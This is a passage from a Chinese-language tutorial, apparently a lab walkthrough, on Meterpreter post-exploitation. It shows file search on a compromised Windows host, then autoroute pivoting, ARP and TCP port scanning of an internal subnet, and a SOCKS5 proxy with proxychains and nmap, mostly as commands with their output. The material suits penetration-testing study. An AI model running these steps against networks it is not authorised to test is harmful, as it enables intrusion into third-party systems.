0000/---------   1237872  fif   1971-09-30 09:18:56 -0400  pagefile.sys
40777/rwxrwxrwx  0        dir   2020-04-25 20:38:11 -0400  software

meterpreter > rmdir hack 
Removing directory: hack
meterpreter > ls
Listing: c:
============

Mode             Size     Type  Last modified              Name
----             ----     ----  -------------              ----
40777/rwxrwxrwx  0        dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx  0        dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx  0        dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx  4096     dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx  0        dir   2020-02-13 10:51:36 -0500  Recovery
40777/rwxrwxrwx  4096     dir   2020-02-13 10:48:53 -0500  System Volume Information
40555/r-xr-xr-x  4096     dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx  16384    dir   2009-07-13 23:20:08 -0400  Windows
0000/---------   1237856  fif   1971-09-30 09:18:56 -0400  pagefile.sys
40777/rwxrwxrwx  0        dir   2020-04-25 20:38:11 -0400  software

meterpreter >

搜索特定文件

meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

    -d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
    -f <opt>  A file pattern glob to search for. (e.g. *secret*.doc?)
    -h        Help Banner
    -r <opt>  Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\ -f *cmd.exe
Found 12 results...
    c:Program FilesVMwareVMware ToolsVMwareNamespaceCmd.exe (36784 bytes)
    c:Program FilesVMwareVMware ToolsVMwareToolboxCmd.exe (85424 bytes)
    c:WindowsSystem32cmd.exe (345088 bytes)
    c:WindowsSystem32VaultCmd.exe (27136 bytes)
    c:WindowsSysWOW64cmd.exe (302592 bytes)
    c:Windowswinsxsamd64_microsoft-windows-commandprompt_31bf3856ad364e35_6.1.7601.17514_none_e932cc2c30fc13b0cmd.exe (345088 bytes)
    c:Windowswinsxsamd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_6f0f7833cb71e18dappcmd.exe (193536 bytes)
    c:Windowswinsxsamd64_microsoft-windows-security-vault_31bf3856ad364e35_6.1.7600.16385_none_4d5e025e54ba15f8VaultCmd.exe (27136 bytes)
    c:Windowswinsxsamd64_microsoft-windows-snmp-evntcmd_31bf3856ad364e35_6.1.7600.16385_none_14f9b9481db6293bevntcmd.exe (25600 bytes)
    c:Windowswinsxswow64_microsoft-windows-commandprompt_31bf3856ad364e35_6.1.7601.17514_none_f387767e655cd5abcmd.exe (302592 bytes)
    c:Windowswinsxswow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.1.7601.17514_none_79642285ffd2a388appcmd.exe (155648 bytes)
    c:Windowswinsxsx86_microsoft-windows-snmp-evntcmd_31bf3856ad364e35_6.1.7600.16385_none_b8db1dc46558b805evntcmd.exe (20480 bytes)
meterpreter >

基本网络操作指令

  • 指令指南
    Command       Description
    -------       -----------
    arp           显示ARP缓存
    getproxy      查看当前代理配置
    ifconfig      查看网络接口信息
    ipconfig      查看网络接口信息
    netstat       查看网络连接情况(netstat -ano)
    route         查看和修改路由表

路由转发+内网收集

实战:添加内网路由,对内网进行信息收集

  • autoroute添加路由
run autoroute -h #查看帮助
run get_local_subnets            #查看目标内网网段地址
run autoroute -s 192.168.9.0/24  #添加到目标环境网络
run autoroute -p  #查看添加的路由

查看内网www主机IP信息

meterpreter > ifconfig 

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:23:57:f3
MTU          : 1500
IPv4 Address : 192.168.9.50
IPv4 Netmask : 255.255.255.0

meterpreter >

添加内网路由并查看:(注意:该配置是在www服务器的meterpreter会话中配置的,而不是内网普通用户主机)

meterpreter > run autoroute -s 192.168.9.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.9.0/255.255.255.0...
[+] Added route to 192.168.9.0/255.255.255.0 via 192.33.6.200
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.9.0        255.255.255.0      Session 3

meterpreter >
  • 内网信息收集

内网信息收集:利用arp_scannerportscan等脚本模块进行信息收集

对内网主机进行一个收集

meterpreter > info post/windows/gather/arp_scanner

       Name: Windows Gather ARP Scanner
     Module: post/windows/gather/arp_scanner
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target address range or CIDR identifier
  SESSION                   yes       The session to run this module on.
  THREADS  10               no        The number of concurrent threads

Description:
  This Module will perform an ARP scan for a given IP range through a 
  Meterpreter Session.



Module options (post/windows/gather/arp_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   SESSION                   yes       The session to run this module on.
   THREADS  10               no        The number of concurrent threads

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.9.0/24 THREADS=50

[*] Running module against SERVER
[*] ARP Scanning 192.168.9.0/24
[+]     IP: 192.168.9.50 MAC 00:0c:29:23:57:f3 (VMware, Inc.)
[+]     IP: 192.168.9.101 MAC 00:0c:29:fb:6f:2e (VMware, Inc.)
[+]     IP: 192.168.9.254 MAC 00:0c:29:8c:0f:e7 (VMware, Inc.)
meterpreter >

对收集到的特定主机192.168.9.101进行端口扫描

meterpreter > info auxiliary/scanner/portscan/tcp 

       Name: TCP Port Scanner
     Module: auxiliary/scanner/portscan/tcp
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  hdm <x@hdm.io>
  kris katterjohn <katterjohn@gmail.com>

Check supported:
  No

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  CONCURRENCY  10               yes       The number of concurrent ports to check per host
  DELAY        0                yes       The delay between connections, per thread, in milliseconds
  JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
  PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  THREADS      1                yes       The number of concurrent threads (max one per host)
  TIMEOUT      1000             yes       The socket connect timeout in milliseconds

Description:
  Enumerate open TCP services by performing a full TCP connect on each 
  port. This does not need administrative privileges on the source 
  machine, which may be useful if pivoting.



Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

meterpreter > run auxiliary/scanner/portscan/tcp RHOSTS=192.168.9.101 THREADS=50 TIMEOUT=500 RPORTS=1-65535

[+] 192.168.9.101:        - 192.168.9.101:139 - TCP OPEN
[+] 192.168.9.101:        - 192.168.9.101:135 - TCP OPEN
[+] 192.168.9.101:        - 192.168.9.101:445 - TCP OPEN
[+] 192.168.9.101:        - 192.168.9.101:3389 - TCP OPEN
meterpreter >

系统代理+内网收集

实战:配置系统代理,对内网进行信息收集(前提:在www服务器的meterpreter会话中已配置内网的路由转发功能)

  • socks5系统代理

在MSF中设置并启动本地系统代理:127.0.0.1:1080

msf5 > use auxiliary/server/socks5 
msf5 auxiliary(server/socks5) > show options 

Module options (auxiliary/server/socks5):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run SOCKS5 proxy

msf5 auxiliary(server/socks5) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf5 auxiliary(server/socks5) > show options 

Module options (auxiliary/server/socks5):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   127.0.0.1        yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run SOCKS5 proxy


msf5 auxiliary(server/socks5) > 
msf5 auxiliary(server/socks5) > run
[*] Auxiliary module running as background job 0.

[*] Starting the socks5 proxy server
msf5 auxiliary(server/socks5) >

然后,在本地配置proxychains软件代理,使得proxychains代理的流量由MSF代理请求转发

 → Qftm :~/Desktop# vim /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080
  • 内网信息收集

使用已配置的proxychains代理工具进行协助对内网进行信息收集

 → Qftm :~/Desktop# proxychains nmap -Pn -sT 192.168.9.101
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:20 EDT
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:256-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:8080-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:554-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:1720-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:110-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:5900-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:199-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:21-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:8888-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:80-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:3389-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:111-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:139-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:3306-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:143-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:443-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:23-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:587-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:113-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:995-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:25-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:993-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:1025-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:22-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:1723-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:3920-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:2393-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:49160-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:49167-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.9.101:1433-<--timeout

 

Refference

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多